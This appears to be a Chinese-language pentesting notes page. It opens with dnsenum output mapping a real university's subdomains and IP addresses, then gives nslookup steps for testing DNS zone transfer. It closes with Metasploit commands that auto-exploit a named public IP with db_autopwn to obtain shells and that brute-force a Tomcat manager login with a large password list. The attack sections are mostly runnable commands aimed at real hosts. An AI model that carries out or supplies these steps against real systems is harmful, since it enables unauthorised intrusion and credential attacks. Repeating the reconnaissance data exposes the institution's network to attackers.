jw.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A???????? 10.1.90.3
jxjy2.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.255.187
jxjyxy.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 218.194.173.12
kjgx.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.70.34.236
learning.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 202.202.240.151
lib.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.244.5
library.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.244.5
library10.cqjtu.edu.cn.????????????????? 86400??? IN??? A??????? 202.202.244.10
library2.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 202.202.244.2
library3.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 202.202.244.3
library4.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 202.202.244.4
library6.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 202.202.244.6
library7.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 202.202.244.7
lmsj.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.4
lx.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 218.194.173.131
lxzx.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.4
mail.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.35
mail2.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.115
mailhost.cqjtu.edu.cn.?????????????????? 86400??? IN??? CNAME??? mail.cqjtu.edu.cn.
mailserver.cqjtu.edu.cn.???????????????? 86400??? IN??? CNAME??? mail.cqjtu.edu.cn.
map.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.186
math.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.16
mbte.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.4
mdwhs.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.7
meeting.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 218.194.173.26
midc.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.16
moa.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.29
mobile.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.117
movie.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.249
music.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.247
navigation.cqjtu.edu.cn.???????????????? 86400??? IN??? A??????? 202.202.240.7
news.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.16
nic.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.7
niwrerc.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 218.194.173.4
nsrijrc.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.240.16
nvsetc.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.7
nycgge2016.cqjtu.edu.cn.???????????????? 86400??? IN??? A??????? 202.202.240.7
oa.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 202.202.240.28
p2p.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.240
pic.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.89
pop.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.35
portal.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.111
postdoctor.cqjtu.edu.cn.???????????????? 86400??? IN??? A??????? 202.202.240.7
professor.cqjtu.edu.cn.????????????????? 86400??? IN??? A??????? 202.202.240.7
bmtang.professor.cqjtu.edu.cn.?????????? 86400??? IN??? A??????? 202.202.240.7
liulun.professor.cqjtu.edu.cn.?????????? 86400??? IN??? A??????? 202.202.240.7
qks.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 218.194.173.20
qlgczx.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.7
radio.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.254
remote.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.244.4
rwxy.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.16
sfsd.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 10.8.135.253
sgjz.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.4
shop.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.240
sjjxxt.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.202
skb.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 218.194.173.4
slsy.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.4
slsyzx.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 218.194.173.18
smtp.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.35
smve.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.16
sqjcsys.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.240.123
stat.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.252
szb.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 218.194.173.18
test.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.251.135
test2.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.251.132
tingting.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 202.202.240.252
tracker248.cqjtu.edu.cn.???????????????? 86400??? IN??? A??????? 202.202.240.248
tran.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.8
ty.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 202.202.240.254
tyb.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 218.194.173.4
tydown1.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.240.76
tydown2.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.240.75
ume.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.231
uss.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.152
v1.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 202.202.240.11
v2.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 202.202.240.20
video.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.90
vip.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.244.12
virus.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.55
vod.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.249
vod1.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.71
vod2.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.72
vod3.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.73
vod4.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.74
vod86.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.86
vod88.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.88
vpn.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 218.70.34.235
webmail.cqjtu.edu.cn.??????????????????? 86400??? IN??? CNAME??? mail.cqjtu.edu.cn.
weboa.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.244.131
weixin.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 218.194.173.23
wsjf.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.5
wtdsc.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.7
www.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.6
www1.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.8
www2.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.7
xbskb.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 218.194.173.20
xbzk.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.20
xcb.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.16
xfcx.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.115
xgb.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 218.194.173.25
xgxt.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.25
xks.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.16
xkx.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.16
xlzx.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.25
xqbd.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.193
xwcb.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.16
xxgk.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.16
xz.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 202.202.240.248
yayuan.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.16
ygb.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.16
yjszs.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.7
yjszswap.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 218.194.173.23
yx.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 218.194.173.131
yxm.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 218.194.173.138
zhanqun.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.240.15
zhiyuan.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.240.16
zsj.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.111
zsjy.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.251.66
zygcs.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.7

Scraping cqjtu.edu.cn. subdomains from Google:
_______________________________________________

Error GETing http://www.google.com/ncr: Can’t connect to www.google.com:80 (timeout) at /usr/bin/dnsenum line 909
4.利用dos命令nslookup判断域传送漏洞
nslookup
set type=ns #配置ns类型
test.cn #输入域名查询,可以看到dns服务器地址
server 10.95.18.13 #查询dns
set type=all #设置所有类型
ls -d test.cn #检查域传送安全

 

Kali Metasploit nmap 自动化getshell使用

service postgresql start
msfconsole
db_status
db_nmap -sV -O -T4 116.255.141.167
load db_autopwn
执行上面命令会发现提示不存在db_autopwn文件,/opt/metasploit/apps/pro/msf3/plugins/db_autopwn
去http://download.csdn.net/detail/terrying/5063334 下载好文件,放到上面目录再次执行就好了。
db_autopwn -p -e -t -r

#查看shell
sessions -l
#查看漏洞
vulns
#删除主机
hosts -d 主机IP

Metasploit之Tomcat暴力破解

Tomcat服务主页访问是hello world,于是试了试/manager/html目录也可以访问,是tomcat服务,不知道密码,没办法拿shell,找了下cve,这个版本比较新,没有老的漏洞了。

开启Metasploit
service postgresql start
msfconsole

#help 查看使用方式
set RHOSTS 110.110.110.110
set RPORT 8180
run

#默认只有55次常规测试,一般tomcat没改密码或者是老版本的时候,才会轻易破解出来,否则还需要自定义用户和密码字典
set pass_file /root/Desktop/wordlists/metasploit-jtr/password.lst #这个字典可以跑530383次
#默认直接使用kali 里面的密码字典了,用户可以指定为一个,或者一个字段。set username tomcat